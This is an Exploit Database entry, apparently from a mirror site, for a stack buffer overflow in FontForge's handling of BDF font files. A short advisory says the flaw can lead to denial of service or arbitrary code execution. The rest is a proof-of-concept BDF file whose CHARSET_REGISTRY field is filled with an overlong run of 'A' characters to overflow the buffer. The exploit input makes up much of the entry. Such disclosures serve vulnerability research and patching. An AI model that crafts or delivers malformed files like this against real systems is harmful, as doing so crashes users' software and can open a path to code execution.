FontForge – ‘.BDF’ Font File Stack Buffer Overflow (PoC)

• Exploit Database
• 98 阅读

• 作者： Ulrik Persson
  日期： 2010-12-14
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/15732/

• Source: https://www.securityfocus.com/bid/45162/info
  
  FontForge is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. 
  
  An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
  
  FontForge 0.0.20100501-2 is vulnerable; other versions may also be affected.
  
  PoC:
  
  STARTFONT 2.1
  FONT -gnu-unifont-medium-r-normal--16-160-75-75-c-80-iso10646-1
  SIZE 16 75 75
  CHARSET_REGISTRY AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  FONTBOUNDINGBOX 16 16 0 -2
  STARTPROPERTIES 2
  FONT_ASCENT 14
  FONT_DESCENT 2
  ENDPROPERTIES
  CHARS 1
  STARTCHAR U+0041
  ENCODING 65
  SWIDTH 500 0
  DWIDTH 8 0
  BBX 8 16 0 -2
  BITMAP 
  00
  00
  00
  00
  18
  24
  24
  42
  42
  7E
  42
  42
  42
  42
  00
  00
  ENDCHAR
  ENDFONT
  

  Bash

  Copy